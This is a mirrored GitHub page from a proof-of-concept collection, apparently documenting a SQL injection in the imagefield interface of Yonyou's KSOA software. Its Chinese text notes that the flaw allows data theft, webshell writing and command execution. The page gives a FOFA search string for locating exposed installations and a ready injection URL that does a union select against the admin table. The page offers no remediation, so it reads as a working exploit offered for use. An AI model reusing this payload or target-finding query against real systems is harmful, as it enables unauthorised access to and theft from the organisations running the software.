POC/用友时空KSOA-imagefield接口存在SQL注入漏洞.md at b8f73ea41b8ba115162570946d919ea813a4a0f3

admin/POC

Fork 0

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

614 B

Raw Blame History

用友时空KSOA-imagefield接口存在SQL注入漏洞

用友时空KSOA imagefield接口存在SQL注入漏洞，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa

app="用友-时空KSOA"

poc

/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+

614 B Raw Blame History Unescape Escape

用友时空KSOA-imagefield接口存在SQL注入漏洞

fofa

poc

614 B

Raw Blame History